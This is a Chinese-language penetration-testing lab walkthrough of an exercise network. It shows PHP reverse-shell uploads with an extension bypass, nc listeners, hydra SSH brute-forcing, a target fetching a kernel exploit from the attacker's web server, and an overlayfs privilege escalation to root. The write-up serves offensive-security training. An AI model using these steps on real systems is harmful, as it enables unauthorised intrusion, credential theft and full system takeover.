下一題:
起手式nmap:
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.134
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:34 EDT
Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.064s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 29.74 seconds
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.153
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:36 EDT
Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.054s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 30.64 seconds
┌──(root㉿kali)-[~]
└─# nmap -p80 -sC -sV -O -A 172.16.1.134 172.16.1.153
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 20:37 EDT
Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Maket web Site
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (93%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 4.0 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 61.38 ms 192.168.200.1
2 11.42 ms market.itop.com.tw (172.16.1.134)
Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.051s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Ice Hrm Login
|_Requested resource was http://hr.itop.com.tw/app/login.php
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (92%), Linux 3.13 (90%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%), Linux 3.13 or 4.2 (89%), Linux 3.16 - 4.6 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.1.134
2 61.44 ms hr.itop.com.tw (172.16.1.153)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 12.77 seconds
發現有網址,所以需要改一下ip的對照表:
┌──(root㉿kali)-[~]
└─# vim /etc/hosts
要新增如下圖紅線:
這樣才能連的到:
用admin/admin登入:
這個cms是可以提供上傳頭像,所以先找找reverse shell的php:
┌──(root㉿kali)-[~]
└─# cd /home/kali/PT_day3
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 52
drwxr-xr-x 2 root root 4096 Mar 12 03:25 .
drwxr-xr-x 22 kali kali 4096 Mar 17 20:31 ..
-rw-r--r-- 1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x 1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x 1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x 1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x 1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x 1 root root 996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x 1 root root 5495 Mar 12 03:21 php-reverse-shell.jpg
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 60
drwxr-xr-x 2 root root 4096 Mar 17 20:58 .
drwxr-xr-x 22 kali kali 4096 Mar 17 20:31 ..
-rw-r--r-- 1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x 1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x 1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x 1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x 1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x 1 root root 996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x 1 root root 5495 Mar 12 03:21 php-reverse-shell.jpg
-rwxr-xr-x 1 root root 5496 Mar 17 20:58 php-reverse-shell.php
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv php-reverse-shell.php ccc_reverse.php
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim ccc_reverse.php
aaa注意一下現在我們的IP:
改一下:
到下圖上傳:
注意先改一下附檔名:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv ccc_reverse.php ccc_reverse.jpg
並開啟攔截:
上傳:
等上傳時,把攔截到的檔案的副檔名改掉:
依下圖順序操作:
再切到以下畫面,上傳後的位址在下圖紅線處:
記得,觸發前要先監聽:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
網址列打上後按Enter觸發:
成功反彈:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.7] from (UNKNOWN) [172.16.1.153] 44256
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
09:29:27 up 6:33, 2 users, load average: 0.13, 0.14, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jason :0 :0 17Apr21 ?xdm? 34:31 0.11s init --user
jason pts/12 :0 17Apr21 249days 0.10s 1.38s gnome-terminal
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
穩定shell:
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ gcc -v
gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
這一台沒用,沒有gcc,再去打打看134。
既然是網頁,那就看看它藏了什麼目錄:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nikto -host http://172.16.1.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.1.134
+ Target Hostname: 172.16.1.134
+ Target Port: 80
+ Start Time: 2023-03-17 21:44:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2cf6, size: 597701736c404, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7923 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-03-17 21:47:29 (GMT-4) (168 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# dirb http://172.16.1.134
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Mar 17 21:48:55 2023
URL_BASE: http://172.16.1.134/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.1.134/ ----
+ http://172.16.1.134/index.html (CODE:200|SIZE:11510)
+ http://172.16.1.134/server-status (CODE:403|SIZE:292)
-----------------
END_TIME: Fri Mar 17 21:49:51 2023
DOWNLOADED: 4612 - FOUND: 2
同樣的也要改一下表,這樣才連的上去:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim /etc/hosts
要改的如下紅圈處:
連上以後也沒什麼東西:
所以一樣暴力破解:
┌──(root㉿kali)-[~]
└─# dirb http://market.itop.com.tw
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 27 00:41:28 2023
URL_BASE: http://market.itop.com.tw/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://market.itop.com.tw/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/
+ http://market.itop.com.tw/index.html (CODE:200|SIZE:141)
+ http://market.itop.com.tw/server-status (CODE:403|SIZE:298)
---- Entering directory: http://market.itop.com.tw/admin/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/
+ http://market.itop.com.tw/admin/index.html (CODE:200|SIZE:141)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/
+ http://market.itop.com.tw/admin/fckeditor/index.html (CODE:200|SIZE:141)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/ ----
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/_source/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/css/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/dialog/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/filemanager/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/images/
+ http://market.itop.com.tw/admin/fckeditor/editor/index.html (CODE:200|SIZE:141)
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/js/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/lang/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/plugins/
==> DIRECTORY: http://market.itop.com.tw/admin/fckeditor/editor/skins/
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/_source/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/dialog/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/filemanager/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://market.itop.com.tw/admin/fckeditor/editor/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Feb 27 00:48:38 2023
DOWNLOADED: 18448 - FOUND: 5
查到有一個上傳用的頁面,依照下圖數字順序操作:
開啟burp suite來攔截:
aaa先把剛剛用過的jpg改回php:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv ccc_reverse.jpg ccc_reverse.php
上傳:
aaa這一次不用特別改什麼,就上傳就好:
觸發前當然要先監聽:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
正式觸發:
成功反彈:
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.7] from (UNKNOWN) [172.16.1.134] 59482
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
10:13:15 up 1 day, 2:10, 2 users, load average: 0.12, 0.09, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jason :0 :0 16Apr21 ?xdm? 1:03m 0.10s init --user
jason pts/0 :0 15Dec21 457days 0.04s 0.04s bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
但一樣沒有gcc:
$ gcc
/bin/sh: 1: gcc: not found
所以這一次開始大規模的掃:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -F 172.16.1-20.*
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:20 EDT
Nmap scan report for 172.16.1.51
Host is up (0.026s latency).
Not shown: 89 filtered tcp ports (no-response), 8 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap scan report for 172.16.1.67
Host is up (0.037s latency).
All 100 scanned ports on 172.16.1.67 are in ignored states.
Not shown: 100 closed tcp ports (reset)
Nmap scan report for 172.16.1.87
Host is up (0.042s latency).
Not shown: 90 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 172.16.1.105
Host is up (0.037s latency).
Not shown: 88 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5060/tcp open sip
8081/tcp open blackice-icecap
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 172.16.1.112
Host is up (0.036s latency).
Not shown: 96 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.1.120
Host is up (0.035s latency).
Not shown: 92 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
8081/tcp open blackice-icecap
Nmap scan report for market.itop.com.tw (172.16.1.134)
Host is up (0.035s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for hr.itop.com.tw (172.16.1.153)
Host is up (0.035s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.16.1.157
Host is up (0.025s latency).
Not shown: 97 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp closed https
Nmap scan report for 172.16.1.191
Host is up (0.037s latency).
Not shown: 95 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8888/tcp open sun-answerbook
Nmap scan report for wpress.itop.com.tw (172.16.1.222)
Host is up (0.038s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.16.3.124
Host is up (0.034s latency).
Not shown: 95 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 172.16.3.125
Host is up (0.037s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.3.126
Host is up (0.035s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.16.3.128
Host is up (0.033s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 172.16.5.1
Host is up (0.033s latency).
Not shown: 94 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.19.2
Host is up (0.034s latency).
Not shown: 91 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
Nmap scan report for 172.16.19.9
Host is up (0.035s latency).
Not shown: 90 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 172.16.20.3
Host is up (0.034s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.16.20.6
Host is up (0.035s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.16.20.7
Host is up (0.036s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 5120 IP addresses (21 hosts up) scanned in 51.91 seconds
打打看其中一個:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p- 172.16.3.128
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:22 EDT
Nmap scan report for 172.16.3.128
Host is up (0.059s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 30.61 seconds
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p22 172.16.3.128 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 22:29 EDT
Nmap scan report for 172.16.3.128
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 ce8eb17409f0e9ac520810f2d82eb6e0 (DSA)
| 2048 a2c1d9a1e1f7302eae85cb050c3559ed (RSA)
| 256 0d8658bbfb1c322e0d70f95cf1e13eca (ECDSA)
|_ 256 b6e04ffd17be8f891da29a0cfe45a3ef (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.10 - 3.16 (93%), Linux 3.16 (93%), Linux 3.13 (91%), Linux 3.18 (90%), Linux 3.10 - 3.12 (89%), Linux 3.10 - 4.11 (89%), Linux 3.12 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 62.84 ms 192.168.200.1
2 11.76 ms 172.16.3.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.95 seconds
只有ssh有開,hydra爆帳密給它死:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# hydra -l jason -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt ssh://172.16.3.128
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-17 22:31:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking ssh://172.16.3.128:22/
[STATUS] 82.00 tries/min, 82 tries in 00:01h, 999921 to do in 203:15h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 999727 to do in 181:07h, 13 active
[22][ssh] host: 172.16.3.128 login: jason password: apollo
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-17 22:37:17
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ssh jason@172.16.3.128
jason@172.16.3.128's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
775 packages can be updated.
483 updates are security updates.
Last login: Sat Oct 29 16:20:08 2022 from 192.168.200.15
jason@Ubuntu14:~$
順利get shell後,當然是看看能不能提權,所以要把枚舉工具送進去:
┌──(root㉿kali)-[~]
└─# cd /home/kali
┌──(root㉿kali)-[/home/kali]
└─# ls -al
total 1040
drwxr-xr-x 22 kali kali 4096 Mar 17 21:29 .
drwxr-xr-x 4 root root 4096 Jan 15 00:59 ..
-rw-r--r-- 1 kali kali 220 Aug 8 2022 .bash_logout
-rw-r--r-- 1 kali kali 5551 Aug 8 2022 .bashrc
-rw-r--r-- 1 kali kali 3526 Aug 8 2022 .bashrc.original
drwx------ 6 kali kali 4096 Feb 19 07:36 .BurpSuite
drwxr-xr-x 10 kali kali 4096 Feb 19 04:23 .cache
drwxr-xr-x 15 kali kali 4096 Feb 27 06:51 .config
-rw-r--r-- 1 kali kali 13176 Mar 12 04:32 cve-2017-16995.c
-rw-r--r-- 1 kali kali 4715 Mar 11 03:16 cyberlab.ovpn
drwxr-xr-x 2 kali kali 4096 Dec 10 01:17 Desktop
-rw-r--r-- 1 kali kali 35 Nov 7 06:23 .dmrc
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Documents
drwxr-xr-x 2 kali kali 4096 Mar 11 03:17 Downloads
-rw-r--r-- 1 kali kali 11759 Aug 8 2022 .face
lrwxrwxrwx 1 kali kali 5 Aug 8 2022 .face.icon -> .face
drwx------ 3 kali kali 4096 Nov 7 06:23 .gnupg
-rw------- 1 kali kali 0 Nov 7 06:23 .ICEauthority
drwxr-xr-x 4 kali kali 4096 Feb 19 05:32 .java
-rw-r--r-- 1 kali kali 46631 Mar 12 04:03 LinEnum.sh
-rw-r--r-- 1 root root 776167 Apr 17 2022 linpeas.sh
drwx------ 3 kali kali 4096 Nov 7 06:23 .local
drwx------ 5 kali kali 4096 Nov 13 02:21 .mozilla
drwxr-xr-x 10 kali kali 4096 Feb 26 07:08 .msf4
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Music
-rw------- 1 kali kali 103 Dec 10 22:12 .mysql_history
drwxr-xr-x 2 kali kali 4096 Feb 26 06:43 Pictures
-rw-r--r-- 1 kali kali 807 Aug 8 2022 .profile
drwxr-xr-x 2 root root 4096 Mar 17 22:36 PT_day3
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Public
drwx------ 2 kali kali 4096 Jan 15 01:42 .ssh
-rw-r--r-- 1 kali kali 0 Nov 13 05:38 .sudo_as_admin_successful
drwxr-xr-x 5 kali kali 4096 Dec 31 01:50 target_machine
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Templates
-rw-r----- 1 kali kali 4 Mar 17 20:27 .vboxclient-clipboard.pid
-rw-r----- 1 kali kali 5 Mar 17 20:27 .vboxclient-display-svga-x11.pid
-rw-r----- 1 kali kali 4 Mar 17 20:27 .vboxclient-draganddrop.pid
-rw-r----- 1 kali kali 4 Mar 17 20:27 .vboxclient-seamless.pid
-rw-r----- 1 kali kali 4 Mar 17 20:27 .vboxclient-vmsvga-session-tty7.pid
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Videos
-rw------- 1 kali kali 1988 Dec 10 00:41 .viminfo
drwxr-xr-x 2 kali kali 4096 Nov 13 02:19 vulnOSv2
-rw-r--r-- 1 kali kali 180 Mar 12 04:03 .wget-hsts
-rw------- 1 kali kali 299 Mar 17 21:29 .Xauthority
-rw------- 1 kali kali 8473 Mar 17 21:10 .xsession-errors
-rw------- 1 kali kali 8520 Mar 12 03:50 .xsession-errors.old
-rw------- 1 kali kali 8644 Mar 12 04:46 .zsh_history
-rw-r--r-- 1 kali kali 10877 Aug 8 2022 .zshrc
┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.16.3.128 - - [17/Mar/2023 22:42:02] "GET /linpeas.sh HTTP/1.1" 200 -
移到tmp資料夾,才准許寫入:(linpeas的結果太長,所以不貼)
總之有CVE-2015-8660 overlayfs。
上exploit-db查一下:
看看下面紅圈,應該很類似現在這一台靶機的環境:
可以用下圖方式下載poc:
也可以利用EDB-ID在本機找:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# searchsploit -m 37292
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /usr/share/exploitdb/exploits/linux/local/37292.c
Codes: CVE-2015-1328
Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /home/kali/PT_day3/37292.c
同樣的在poc所在資料夾開簡易server:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
讓靶機下載腳本:
jason@Ubuntu14:/tmp$ wget http://192.168.200.7/37292.c
--2022-10-29 21:49:39-- http://192.168.200.7/37292.c
Connecting to 192.168.200.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’
100%[======================================================>] 4,968 --.-K/s in 0.008s
2022-10-29 21:49:39 (594 KB/s) - ‘37292.c’ saved [4968/4968]
jason@Ubuntu14:/tmp$ gcc 37292.c -o ofs
jason@Ubuntu14:/tmp$ ls -l
total 984
-rw-rw-r-- 1 jason jason 4968 3月 18 2023 37292.c
-rwxrwxr-x 1 jason jason 776167 4月 17 2022 linpeas.sh
-rw-rw-r-- 1 jason jason 197924 10月 29 21:20 linpeas.txt
-rwxrwxr-x 1 jason jason 13644 10月 29 21:50 ofs
drwx------ 2 apollo apollo 4096 12月 15 2021 ssh-p8kd9p9WZt8t
-rw-rw-r-- 1 apollo apollo 0 12月 15 2021 unity_support_test.1
jason@Ubuntu14:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
也可以試試scp來下載檔案。剛剛的兩台機器也應該有一樣的弱點,但如果直接把172.16.3.128
的ofs執行檔給複製過去,會發現沒法用,因為CPU不同。